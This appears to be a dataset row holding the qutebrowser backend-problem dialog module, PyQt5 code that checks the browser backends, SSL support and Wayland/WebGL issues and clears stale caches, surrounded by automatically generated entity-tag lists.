'0.14'], ['PERSON', 'EnvironmentError'], ['LOCATION', 'configparser'], ['PERSON', 'cfg.versionfile_source = get(parser'], ['PERSON', 'EnvironmentError'], ['PERSON', 'cfg.style'], ['PERSON', 'cfg.versionfile_source'], ['PERSON', 'EnvironmentError'], ['PERSON', 'dirname = os.path.basename(root'], ['PERSON', 'rootdir'], ['PERSON', 'dirname'], ['PERSON', 'dirname[len(parentdir_prefix'], ['PERSON', 'NotThisMethod(""no'], ['LOCATION', 'print(fmt'], ['LOCATION', 'n_seen'], ['DATE_TIME', 'n_seen'], ['LOCATION', '.git'], ['LOCATION', 'cfg.style'], ['PERSON', 'NotThisMethod(""no'], ['LOCATION', 'print(fmt'], ['NRP', 'f.write(""%s'], ['PERSON', 'dirname = os.path.basename(root'], ['PERSON', 'rootdir'], ['PERSON', 'dirname'], ['PERSON', 'dirname[len(parentdir_prefix'], ['PERSON', 'NotThisMethod(""no version_json'], ['PERSON', 'separators='], ['LOCATION', 'n_seen'], ['DATE_TIME', 'n_seen'], ['LOCATION', 'sys.modules'], ['PERSON', 'get_cmdclass'], ['PERSON', 'zipball'], ['PERSON', 'from_keywords_f'], ['PERSON', 'from_vcs_f'], ['LOCATION', 'cfg.style'], ['PERSON', 'get_cmdclass'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['PERSON', 'open(cfg.versionfile_source'], ['URL', 'cfg.ve'], ['PERSON', 'cfg.style'], ['PERSON', 'cfg.versionfile_source'], ['LOCATION', 'sys.modules'], ['NRP', 'distutils.command.sdist'], ['PERSON', 'hardlink'], ['PERSON', 'cfg.versionfile_source'], ['PERSON', 'versionfile_build'], ['PERSON', 'EnvironmentError'], ['LOCATION', 'configparser.'], ['PERSON', 'EnvironmentError'], ['LOCATION', 'configparser.'], ['PERSON', 'open(cfg.versionfile_source'], ['PERSON', 'cfg.style'], ['PERSON', 'EnvironmentError'], ['LOCATION', 'MANIFEST.in'], ['PERSON', 'cfg.versionfile_source'], ['URL', 'https://github.com/warner/python-versioneer'], ['URL', 'https://pypip.in/version/versioneer/badge.svg?style=flat'], ['URL', 'https://pypi.python.org/pypi/versioneer/'], ['URL', 'https://travis-ci.org/warner/python-versioneer.png?branch=master'], ['URL', 'https://travis-ci.org/warner/python-versioneer'], ['URL', 'https://creativecommons.org/publicdomain/zero/1.0/'], ['URL', 'https://github.com/warner/python-versioneer'], ['URL', 'https://github.com/warner/python-versioneer/issues/52'], ['URL', 'http://docs.python.org/2/distutils/sourcedist.html#commands'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'versioneer.py'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'DISTANCE.gS'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'distutils.com'], ['URL', 'versioneer.ge'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'setup.cf'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'versioneer.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'MANIFEST.in'], ['URL', 'versioneer.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.ge'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'untagged.NUMCOMMITS.gH'], ['URL', 'setup.py'], ['URL', 'versioneer.py'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'DISTANCE.gH'], ['URL', 'details.md'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'version.py'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'versioneer.VC'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'versioneer.py'], ['URL', 'make-versioneer.py'], ['URL', 'make-versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'versioneer.py'], ['URL', 'os.path.re'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.path.jo'], ['URL', 'setup.py'], ['URL', 'os.path.jo'], ['URL', 'versioneer.py'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'setup.py'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'os.pa'], ['URL', 'sys.ar'], ['URL', 'os.path.jo'], ['URL', 'setup.py'], ['URL', 'os.path.jo'], ['URL', 'versioneer.py'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'sys.ar'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'os.pa'], ['URL', 'versioneer.py'], ['URL', 'os.path.re'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'versioneer.py'], ['URL', 'os.pa'], ['URL', 'setup.cf'], ['URL', 'setup.cf'], ['URL', 'configparser.No'], ['URL', 'configparser.No'], ['URL', 'versioneer.py'], ['URL', 'setup.cf'], ['URL', 'os.path.jo'], ['URL', 'setup.cf'], ['URL', 'configparser.Sa'], ['URL', 'parser.re'], ['URL', 'parser.ge'], ['URL', 'parser.ge'], ['URL', 'cfg.VC'], ['URL', 'cfg.st'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'cfg.pa'], ['URL', 'cfg.ve'], ['URL', 'git.cm'], ['URL', 'e.er'], ['URL', 'p.com'], ['URL', 'sys.ve'], ['URL', 'stdout.de'], ['URL', 'p.re'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py/versioneer.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'cfg.VC'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'git.cm'], ['URL', 'e.er'], ['URL', 'p.com'], ['URL', 'sys.ve'], ['URL', 'stdout.de'], ['URL', 'p.re'], ['URL', 'os.path.ba'], ['URL', 'dirname.st'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'f.re'], ['URL', 'line.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'line.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'f.cl'], ['URL', 'refnames.st'], ['URL', 'r.st'], ['URL', 'refnames.st'], ['URL', 'r.st'], ['URL', 're.se'], ['URL', 'ref.st'], ['URL', 'version.py'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'sys.pl'], ['URL', 'git.cm'], ['URL', 'out.st'], ['URL', 'out.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'tag.st'], ['URL', 'mo.gr'], ['URL', 'mo.gr'], ['URL', 'pieces.ge'], ['URL', 'DISTANCE.gH'], ['URL', '0.gH'], ['URL', 'untagged.DISTANCE.gH'], ['URL', '.post.de'], ['URL', '0.post.de'], ['URL', '.post.de'], ['URL', '0.post.de'], ['URL', 'part.is'], ['URL', '0.0.0.de'], ['URL', 'pieces.ge'], ['URL', 'replacements.it'], ['URL', 're.ma'], ['URL', 'pieces.ge'], ['URL', 'STYLES.ge'], ['URL', 'version.py'], ['URL', 'cfg.ve'], ['URL', 'os.path.re'], ['URL', 'cfg.ve'], ['URL', 'os.pa'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.pa'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'f.re'], ['URL', 'line.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'line.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'f.cl'], ['URL', 'refnames.st'], ['URL', 'r.st'], ['URL', 'refnames.st'], ['URL', 'r.st'], ['URL', 're.se'], ['URL', 'ref.st'], ['URL', 'version.py'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'sys.pl'], ['URL', 'git.cm'], ['URL', 'out.st'], ['URL', 'out.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'tag.st'], ['URL', 'mo.gr'], ['URL', 'mo.gr'], ['URL', 'version.py'], ['URL', 'sys.pl'], ['URL', 'git.cm'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'versioneer.py'], ['URL', 'f.re'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'f.cl'], ['URL', 'f.cl'], ['URL', 'os.path.ba'], ['URL', 'dirname.st'], ['URL', 'versioneer.py'], ['URL', 'version.py'], ['URL', 'f.re'], ['URL', 'version.py'], ['URL', 're.se'], ['URL', 'version.py'], ['URL', 'mo.gr'], ['URL', 'version.py'], ['URL', 'pieces.ge'], ['URL', 'DISTANCE.gH'], ['URL', '0.gH'], ['URL', 'untagged.DISTANCE.gH'], ['URL', '.post.de'], ['URL', '0.post.de'], ['URL', '.post.de'], ['URL', '0.post.de'], ['URL', 'part.is'], ['URL', '0.0.0.de'], ['URL', 'pieces.ge'], ['URL', 'replacements.it'], ['URL', 'name.re'], ['URL', 're.ma'], ['URL', 'pieces.ge'], ['URL', 'STYLES.ge'], ['URL', 'sys.mo'], ['URL', 'cmdclass.py'], ['URL', 'sys.mo'], ['URL', 'cfg.VC'], ['URL', 'setup.cf'], ['URL', 'HANDLERS.ge'], ['URL', 'cfg.VC'], ['URL', 'cfg.VC'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'versioneer.ve'], ['URL', 'os.path.jo'], ['URL', 'cfg.ve'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'handlers.ge'], ['URL', 'handlers.ge'], ['URL', 'handlers.ge'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.pa'], ['URL', 'sys.mo'], ['URL', 'sys.mo'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'sys.mo'], ['URL', 'setup.py'], ['URL', 'sys.mo'], ['URL', 'sys.mo'], ['URL', 'distutils.co'], ['URL', 'vers.ge'], ['URL', 'vers.ge'], ['URL', 'sys.mo'], ['URL', 'setuptools.com'], ['URL', 'distutils.com'], ['URL', 'py.ru'], ['URL', 'version.py'], ['URL', 'cfg.ve'], ['URL', 'os.path.jo'], ['URL', 'cfg.ve'], ['URL', 'sys.mo'], ['URL', 'cfg.ve'], ['URL', 'exe.ru'], ['URL', 'cfg.VC'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.ve'], ['URL', 'sys.mo'], ['URL', 'setuptools.command.sd'], ['URL', 'distutils.command.sd'], ['URL', 'self.distribution.metadata.ve'], ['URL', 'sdist.ru'], ['URL', 'sdist.ma'], ['URL', 'version.py'], ['URL', 'os.path.jo'], ['URL', 'cfg.ve'], ['URL', 'setup.cf'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.py'], ['URL', 'setup.cf'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'configparser.No'], ['URL', 'configparser.No'], ['URL', 'configparser.No'], ['URL', 'setup.cf'], ['URL', 'sys.st'], ['URL', 'os.path.jo'], ['URL', 'setup.cf'], ['URL', 'sys.st'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'cfg.VC'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.ve'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'cfg.ve'], ['URL', 'os.pa'], ['URL', 'f.re'], ['URL', 'versioneer.py'], ['URL', 'version.py'], ['URL', 'MANIFEST.in'], ['URL', 'os.path.jo'], ['URL', 'MANIFEST.in'], ['URL', 'line.st'], ['URL', 'includes.ad'], ['URL', 'MANIFEST.in'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'MANIFEST.in'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'MANIFEST.in'], ['URL', 'cfg.ve'], ['URL', 'MANIFEST.in'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'MANIFEST.in'], ['URL', 'version.py'], ['URL', 'cfg.ve'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'f.re'], ['URL', 'found.ad'], ['URL', 'versioneer.ge'], ['URL', 'found.ad'], ['URL', 'versioneer.ge'], ['URL', 'found.ad'], ['URL', 'versioneer.VC'], ['URL', 'versioneer.ve'], ['URL', 'setup.py'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.VC'], ['URL', 'versioneer.ve'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'sys.ar']]" +109,"# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et: + +# Copyright 2017-2021 Florian Bruhin (The Compiler) dummy@email.com +# +# This file is part of qutebrowser. +# +# qutebrowser is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# qutebrowser is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with qutebrowser. If not, see . + +""""""Dialogs shown when there was a problem with a backend choice."""""" + +import os +import sys +import functools +import html +import enum +import shutil +import argparse +import dataclasses +from typing import Any, List, Sequence, Tuple, Optional + +from PyQt5.QtCore import Qt +from PyQt5.QtWidgets import (QDialog, QPushButton, QHBoxLayout, QVBoxLayout, QLabel, + QMessageBox, QWidget) +from PyQt5.QtNetwork import QSslSocket + +from qutebrowser.config import config, configfiles +from qutebrowser.utils import (usertypes, version, qtutils, log, utils, + standarddir) +from qutebrowser.misc import objects, msgbox, savemanager, quitter + + +class _Result(enum.IntEnum): + + """"""The result code returned by the backend problem dialog."""""" + + quit = QDialog.Accepted + 1 + restart = QDialog.Accepted + 2 + restart_webkit = QDialog.Accepted + 3 + restart_webengine = QDialog.Accepted + 4 + + +@dataclasses.dataclass +class _Button: + + """"""A button passed to BackendProblemDialog."""""" + + text: str + setting: str + value: Any + default: bool = False + + +def _other_backend(backend: usertypes.Backend) -> Tuple[usertypes.Backend, str]: + """"""Get the other backend enum/setting for a given backend."""""" + other_backend = { + usertypes.Backend.QtWebKit: usertypes.Backend.QtWebEngine, + usertypes.Backend.QtWebEngine: usertypes.Backend.QtWebKit, + }[backend] + other_setting = other_backend.name.lower()[2:] + return (other_backend, other_setting) + + +def _error_text(because: str, text: str, backend: usertypes.Backend) -> str: + """"""Get an error text for the given information."""""" + other_backend, other_setting = _other_backend(backend) + if other_backend == usertypes.Backend.QtWebKit: + warning = (""Note that QtWebKit hasn't been updated since "" + ""July 2017 (including security updates)."") + suffix = "" (not recommended)"" + else: + warning = """" + suffix = """" + return (""Failed to start with the {backend} backend!"" + ""

    qutebrowser tried to start with the {backend} backend but "" + ""failed because {because}.

    {text}"" + ""

    Forcing the {other_backend.name} backend{suffix}

    "" + ""

    This forces usage of the {other_backend.name} backend by "" + ""setting the backend = '{other_setting}' option "" + ""(if you have a config.py file, you'll need to set "" + ""this manually). {warning}

    "".format( + backend=backend.name, because=because, text=text, + other_backend=other_backend, other_setting=other_setting, + warning=warning, suffix=suffix)) + + +class _Dialog(QDialog): + + """"""A dialog which gets shown if there are issues with the backend."""""" + + def __init__(self, *, because: str, + text: str, + backend: usertypes.Backend, + buttons: Sequence[_Button] = None, + parent: QWidget = None) -> None: + super().__init__(parent) + vbox = QVBoxLayout(self) + + other_backend, other_setting = _other_backend(backend) + text = _error_text(because, text, backend) + + label = QLabel(text) + label.setWordWrap(True) + label.setTextFormat(Qt.RichText) + vbox.addWidget(label) + + hbox = QHBoxLayout() + buttons = [] if buttons is None else buttons + + quit_button = QPushButton(""Quit"") + quit_button.clicked.connect(lambda: self.done(_Result.quit)) + hbox.addWidget(quit_button) + + backend_text = ""Force {} backend"".format(other_backend.name) + if other_backend == usertypes.Backend.QtWebKit: + backend_text += ' (not recommended)' + backend_button = QPushButton(backend_text) + backend_button.clicked.connect(functools.partial( + self._change_setting, 'backend', other_setting)) + hbox.addWidget(backend_button) + + for button in buttons: + btn = QPushButton(button.text) + btn.setDefault(button.default) + btn.clicked.connect(functools.partial( + self._change_setting, button.setting, button.value)) + hbox.addWidget(btn) + + vbox.addLayout(hbox) + + def _change_setting(self, setting: str, value: str) -> None: + """"""Change the given setting and restart."""""" + config.instance.set_obj(setting, value, save_yaml=True) + + if setting == 'backend' and value == 'webkit': + self.done(_Result.restart_webkit) + elif setting == 'backend' and value == 'webengine': + self.done(_Result.restart_webengine) + else: + self.done(_Result.restart) + + +@dataclasses.dataclass +class _BackendImports: + + """"""Whether backend modules could be imported."""""" + + webkit_error: Optional[str] = None + webengine_error: Optional[str] = None + + +class _BackendProblemChecker: + + """"""Check for various backend-specific issues."""""" + + def __init__(self, *, + no_err_windows: bool, + save_manager: savemanager.SaveManager) -> None: + self._save_manager = save_manager + self._no_err_windows = no_err_windows + + def _show_dialog(self, *args: Any, **kwargs: Any) -> None: + """"""Show a dialog for a backend problem."""""" + if self._no_err_windows: + text = _error_text(*args, **kwargs) + print(text, file=sys.stderr) + sys.exit(usertypes.Exit.err_init) + + dialog = _Dialog(*args, **kwargs) + + status = dialog.exec() + self._save_manager.save_all(is_exit=True) + + if status in [_Result.quit, QDialog.Rejected]: + pass + elif status == _Result.restart_webkit: + quitter.instance.restart(override_args={'backend': 'webkit'}) + elif status == _Result.restart_webengine: + quitter.instance.restart(override_args={'backend': 'webengine'}) + elif status == _Result.restart: + quitter.instance.restart() + else: + raise utils.Unreachable(status) + + sys.exit(usertypes.Exit.err_init) + + def _nvidia_shader_workaround(self) -> None: + """"""Work around QOpenGLShaderProgram issues. + + See https://bugs.launchpad.net/ubuntu/+source/python-qt4/+bug/941826 + """""" + self._assert_backend(usertypes.Backend.QtWebEngine) + utils.libgl_workaround() + + def _xwayland_options(self) -> Tuple[str, List[_Button]]: + """"""Get buttons/text for a possible XWayland solution."""""" + buttons = [] + text = ""

    You can work around this in one of the following ways:

    "" + + if 'DISPLAY' in os.environ: + # XWayland is available, but QT_QPA_PLATFORM=wayland is set + buttons.append( + _Button(""Force XWayland"", 'qt.force_platform', 'xcb')) + text += (""

    Force Qt to use XWayland

    "" + ""

    This allows you to use the newer QtWebEngine backend "" + ""(based on Chromium). "" + ""This sets the qt.force_platform = 'xcb' option "" + ""(if you have a config.py file, you'll need to "" + ""set this manually).

    "") + else: + text += (""

    Set up XWayland

    "" + ""

    This allows you to use the newer QtWebEngine backend "" + ""(based on Chromium). "") + + return text, buttons + + def _handle_wayland_webgl(self) -> None: + """"""On older graphic hardware, WebGL on Wayland causes segfaults. + + See https://github.com/qutebrowser/qutebrowser/issues/5313 + """""" + self._assert_backend(usertypes.Backend.QtWebEngine) + + if os.environ.get('QUTE_SKIP_WAYLAND_WEBGL_CHECK'): + return + + platform = objects.qapp.platformName() + if platform not in ['wayland', 'wayland-egl']: + return + + # Only Qt 5.14 should be affected + if not qtutils.version_check('5.14', compiled=False): + return + if qtutils.version_check('5.15', compiled=False): + return + + # Newer graphic hardware isn't affected + opengl_info = version.opengl_info() + if (opengl_info is None or + opengl_info.gles or + opengl_info.version is None or + opengl_info.version >= (4, 3)): + return + + # If WebGL is turned off, we're fine + if not config.val.content.webgl: + return + + text, buttons = self._xwayland_options() + + buttons.append(_Button(""Turn off WebGL (recommended)"", + 'content.webgl', + False)) + text += (""

    Disable WebGL (recommended)

    "" + ""This sets the content.webgl = False option "" + ""(if you have a config.py file, you'll need to "" + ""set this manually).

    "") + + self._show_dialog(backend=usertypes.Backend.QtWebEngine, + because=(""of frequent crashes with Qt 5.14 on "" + ""Wayland with older graphics hardware""), + text=text, + buttons=buttons) + + def _try_import_backends(self) -> _BackendImports: + """"""Check whether backends can be imported and return BackendImports."""""" + # pylint: disable=unused-import + results = _BackendImports() + + try: + from PyQt5 import QtWebKit + from PyQt5.QtWebKit import qWebKitVersion + from PyQt5 import QtWebKitWidgets + except (ImportError, ValueError) as e: + results.webkit_error = str(e) + else: + if not qtutils.is_new_qtwebkit(): + results.webkit_error = ""Unsupported legacy QtWebKit found"" + + try: + from PyQt5 import QtWebEngineWidgets + except (ImportError, ValueError) as e: + results.webengine_error = str(e) + + return results + + def _handle_ssl_support(self, fatal: bool = False) -> None: + """"""Check for full SSL availability. + + If ""fatal"" is given, show an error and exit. + """""" + if QSslSocket.supportsSsl(): + return + + if qtutils.version_check('5.12.4'): + version_text = (""If you use OpenSSL 1.0 with a PyQt package from "" + ""PyPI (e.g. on Ubuntu 16.04), you will need to "" + ""build OpenSSL 1.1 from sources and set "" + ""LD_LIBRARY_PATH accordingly."") + else: + version_text = (""If you use OpenSSL 1.1 with a PyQt package from "" + ""PyPI (e.g. on Archlinux or Debian Stretch), you "" + ""need to set LD_LIBRARY_PATH to the path of "" + ""OpenSSL 1.0 or use Qt >= 5.12.4."") + + text = (""Could not initialize QtNetwork SSL support. {} This only "" + ""affects downloads and :adblock-update."".format(version_text)) + + if fatal: + errbox = msgbox.msgbox(parent=None, + title=""SSL error"", + text=""Could not initialize SSL support."", + icon=QMessageBox.Critical, + plain_text=False) + errbox.exec() + sys.exit(usertypes.Exit.err_init) + + assert not fatal + log.init.warning(text) + + def _check_backend_modules(self) -> None: + """"""Check for the modules needed for QtWebKit/QtWebEngine."""""" + imports = self._try_import_backends() + + if not imports.webkit_error and not imports.webengine_error: + return + elif imports.webkit_error and imports.webengine_error: + text = (""

    qutebrowser needs QtWebKit or QtWebEngine, but "" + ""neither could be imported!

    "" + ""

    The errors encountered were:

      "" + ""
    • QtWebKit: {webkit_error}"" + ""
    • QtWebEngine: {webengine_error}"" + ""

    "".format( + webkit_error=html.escape(imports.webkit_error), + webengine_error=html.escape(imports.webengine_error))) + errbox = msgbox.msgbox(parent=None, + title=""No backend library found!"", + text=text, + icon=QMessageBox.Critical, + plain_text=False) + errbox.exec() + sys.exit(usertypes.Exit.err_init) + elif objects.backend == usertypes.Backend.QtWebKit: + if not imports.webkit_error: + return + self._show_dialog( + backend=usertypes.Backend.QtWebKit, + because=""QtWebKit could not be imported"", + text=""

    The error encountered was:
    {}

    "".format( + html.escape(imports.webkit_error)) + ) + elif objects.backend == usertypes.Backend.QtWebEngine: + if not imports.webengine_error: + return + self._show_dialog( + backend=usertypes.Backend.QtWebEngine, + because=""QtWebEngine could not be imported"", + text=""

    The error encountered was:
    {}

    "".format( + html.escape(imports.webengine_error)) + ) + + raise utils.Unreachable + + def _handle_cache_nuking(self) -> None: + """"""Nuke the QtWebEngine cache if the Qt version changed. + + WORKAROUND for https://bugreports.qt.io/browse/QTBUG-72532 + """""" + if not configfiles.state.qt_version_changed: + return + + # Only nuke the cache in cases where we know there are problems. + # It seems these issues started with Qt 5.12. + # They should be fixed with Qt 5.12.5: + # https://codereview.qt-project.org/c/qt/qtwebengine-chromium/+/265408 + if qtutils.version_check('5.12.5', compiled=False): + return + + log.init.info(""Qt version changed, nuking QtWebEngine cache"") + cache_dir = os.path.join(standarddir.cache(), 'webengine') + if os.path.exists(cache_dir): + shutil.rmtree(cache_dir) + + def _handle_serviceworker_nuking(self) -> None: + """"""Nuke the service workers directory if the Qt version changed. + + WORKAROUND for: + https://bugreports.qt.io/browse/QTBUG-72532 + https://bugreports.qt.io/browse/QTBUG-82105 + """""" + if ('serviceworker_workaround' not in configfiles.state['general'] and + qtutils.version_check('5.14', compiled=False)): + # Nuke the service worker directory once for every install with Qt + # 5.14, given that it seems to cause a variety of segfaults. + configfiles.state['general']['serviceworker_workaround'] = '514' + affected = True + else: + # Otherwise, just nuke it when the Qt version changed. + affected = configfiles.state.qt_version_changed + + if not affected: + return + + service_worker_dir = os.path.join(standarddir.data(), 'webengine', + 'Service Worker') + bak_dir = service_worker_dir + '-bak' + if not os.path.exists(service_worker_dir): + return + + log.init.info(""Qt version changed, removing service workers"") + + # Keep one backup around - we're not 100% sure what persistent data + # could be in there, but this folder can grow to ~300 MB. + if os.path.exists(bak_dir): + shutil.rmtree(bak_dir) + + shutil.move(service_worker_dir, bak_dir) + + def _assert_backend(self, backend: usertypes.Backend) -> None: + assert objects.backend == backend, objects.backend + + def check(self) -> None: + """"""Run all checks."""""" + self._check_backend_modules() + if objects.backend == usertypes.Backend.QtWebEngine: + self._handle_ssl_support() + self._nvidia_shader_workaround() + self._handle_wayland_webgl() + self._handle_cache_nuking() + self._handle_serviceworker_nuking() + else: + self._assert_backend(usertypes.Backend.QtWebKit) + self._handle_ssl_support(fatal=True) + + +def init(*, args: argparse.Namespace, + save_manager: savemanager.SaveManager) -> None: + """"""Run all checks."""""" + checker = _BackendProblemChecker(no_err_windows=args.no_err_windows, + save_manager=save_manager) + checker.check() +",17433,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'sw=4'], ['DATE_TIME', '2017-2021'], ['PERSON', 'Florian Bruhin'], ['LOCATION', 'qutebrowser'], ['PERSON', 'qutebrowser'], ['PERSON', 'QPushButton'], ['LOCATION', 'configfiles'], ['PERSON', 'standarddir'], ['LOCATION', 'Result(enum'], ['DATE_TIME', 'July 2017'], ['PERSON', 'vbox'], ['PERSON', 'hbox'], ['PERSON', 'quit_button'], ['LOCATION', 'wayland'], ['LOCATION', 'Wayland'], ['DATE_TIME', 'Only Qt 5.14'], ['PERSON', ""qtutils.version_check('5.15""], ['DATE_TIME', '5.14'], ['LOCATION', 'Wayland'], ['NRP', 'PyQt'], ['NRP', 'PyQt'], ['PERSON', 'text=""Could'], ['DATE_TIME', '5.14'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'https://bugs.launchpad.net/ubuntu/+source/python-qt4/+bug/941826'], ['URL', 'https://github.com/qutebrowser/qutebrowser/issues/5313'], ['URL', 'https://bugreports.qt.io/browse/QTBUG-72532'], ['URL', 'https://codereview.qt-project.org/c/qt/qtwebengine-chromium/+/265408'], ['URL', 'https://bugreports.qt.io/browse/QTBUG-72532'], ['URL', 'https://bugreports.qt.io/browse/QTBUG-82105'], ['URL', 'email.com'], ['URL', 'qutebrowser.co'], ['URL', 'enum.Int'], ['URL', 'QDialog.Ac'], ['URL', 'QDialog.Ac'], ['URL', 'QDialog.Ac'], ['URL', 'QDialog.Ac'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'backend.na'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'backend.na'], ['URL', 'backend.na'], ['URL', 'config.py'], ['URL', 'backend.na'], ['URL', 'usertypes.Ba'], ['URL', 'label.se'], ['URL', 'label.se'], ['URL', 'vbox.ad'], ['URL', 'button.clicked.co'], ['URL', 'self.do'], ['URL', 'hbox.ad'], ['URL', 'backend.na'], ['URL', 'usertypes.Ba'], ['URL', 'button.clicked.co'], ['URL', 'functools.pa'], ['URL', 'hbox.ad'], ['URL', 'btn.se'], ['URL', 'button.de'], ['URL', 'btn.clicked.co'], ['URL', 'functools.pa'], ['URL', 'button.se'], ['URL', 'button.va'], ['URL', 'hbox.ad'], ['URL', 'vbox.ad'], ['URL', 'config.instance.se'], ['URL', 'self.do'], ['URL', 'Result.re'], ['URL', 'self.do'], ['URL', 'Result.re'], ['URL', 'self.do'], ['URL', 'Result.re'], ['URL', 'savemanager.Sa'], ['URL', 'sys.st'], ['URL', 'usertypes.Exit.er'], ['URL', 'manager.sa'], ['URL', 'QDialog.Re'], ['URL', 'Result.re'], ['URL', 'quitter.instance.re'], ['URL', 'Result.re'], ['URL', 'quitter.instance.re'], ['URL', 'Result.re'], ['URL', 'quitter.instance.re'], ['URL', 'usertypes.Exit.er'], ['URL', 'usertypes.Ba'], ['URL', 'utils.li'], ['URL', 'qt.fo'], ['URL', 'qt.fo'], ['URL', 'config.py'], ['URL', 'usertypes.Ba'], ['URL', 'os.environ.ge'], ['URL', 'objects.qapp.pl'], ['URL', 'qtutils.ve'], ['URL', 'qtutils.ve'], ['URL', 'info.gl'], ['URL', 'info.ve'], ['URL', 'info.ve'], ['URL', 'config.val.co'], ['URL', 'config.py'], ['URL', 'usertypes.Ba'], ['URL', 'qtutils.is'], ['URL', 'QSslSocket.su'], ['URL', 'qtutils.ve'], ['URL', 'msgbox.ms'], ['URL', 'QMessageBox.Cr'], ['URL', 'usertypes.Exit.er'], ['URL', 'log.in'], ['URL', 'html.es'], ['URL', 'html.es'], ['URL', 'msgbox.ms'], ['URL', 'QMessageBox.Cr'], ['URL', 'usertypes.Exit.er'], ['URL', 'objects.ba'], ['URL', 